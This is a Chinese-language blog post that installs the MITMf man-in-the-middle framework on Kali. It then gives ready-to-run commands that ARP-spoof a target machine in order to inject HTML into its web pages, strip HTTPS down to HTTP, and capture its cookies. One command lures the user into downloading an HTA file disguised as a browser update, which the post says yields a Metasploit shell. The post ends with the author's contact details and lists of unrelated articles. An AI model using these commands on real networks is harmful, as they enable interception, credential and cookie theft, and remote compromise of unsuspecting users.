系统环境:kali

  安装流程参考github官方地址:https://github.com/byt3bl33d3r/MITMf/wiki/Installation

  安装相关依赖:

apt-get install python-dev python-setuptools libpcap0.-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

  下载项目:

git clone https://github.com/byt3bl33d3r/MITMf

  安装相关的子项目和依赖:

cd MITMf && git submodule init && git submodule update --recursive

  安装相关依赖:

pip install -r requirements.txt

  启动并查看MITMf的帮助文件:

python mitmf.py -h

  MITMf的插件挺多的

  基本功能介绍

  在网页中注入HTML代码:

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1 --inject --html-payload '<h1>6666666666666666666</h1>'

  让目标机器浏览的图片全部翻转:

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --upsidedownternet 

  启动sslstrip,把所有的https请求转化为http请求

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1 --hsts 

  在目标机器的 网页中注入 hta 文件, 诱导用户下载, 配合metaspolit可以直接得到shell:

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --hta --text "更新浏览器" 

  监听目标用户的cookies

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --ferretng

  总体来说, 功能非常强大,但是运行的时候, 被攻击的目标机器经常会卡死, 导致网页无法打开 , 用户体验不好, 所以还是用bettercap更靠谱

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329

微信:18101055830

最新文章

  1. 基于Windows10 x64+visual Studio2013+Python2.7.12环境下的Caffe配置学习
  2. js实现图片无缝连接
  3. Kafka 技术文档
  4. Legends-ggplot2图例的一些操作
  5. HTML语言的一些元素(二)
  6. win7系统中桌面图标显示不正常问题
  7. Ubuntu 12.04 安装 Tomcat8 遇到的问题
  8. Redis源代码分析(二十八)--- object创建和释放redisObject物
  9. ionic打包项目,运行时报错A problem occurred configuring root project &#39;android&#39;。。。
  10. SpringMVC入门第二天
  11. gd库的安装
  12. Centos7的目录结构
  13. Python列表操作集合
  14. MVC的WebViewPage
  15. Ecstore Nginx Rewrite(去掉链接中的index.php) ECSTORE 伪静态
  16. redis哈希缓存数据表
  17. Docker运行python容器
  18. DBA_实践指南系列2_Oracle Erp R12系统安装配置设定Setup(案例)
  19. 每日英语:Burning Question / Does Reading In Dim Light Hurt Your Eyes?
  20. 次小生成树(poj1679)

热门文章

  1. python文件和文件夹訪问File and Directory Access
  2. XMPP学习及使用1
  3. MS OFFICE WORD 绝招
  4. js、jquery实现模糊搜索功能
  5. Freemarker页面静态化技术,activemq监听页面变动
  6. 【CSS3】透明度opacity与rgba()区别、光标cursor、display、轮廓outline与margin及border区别、em和rem区别
  7. bzoj 4566: [Haoi2016]找相同字符
  8. 重写JS的鼠标右键点击菜单
  9. ecsmart的开发经历
  10. OpenGL ES学习001---绘制三角形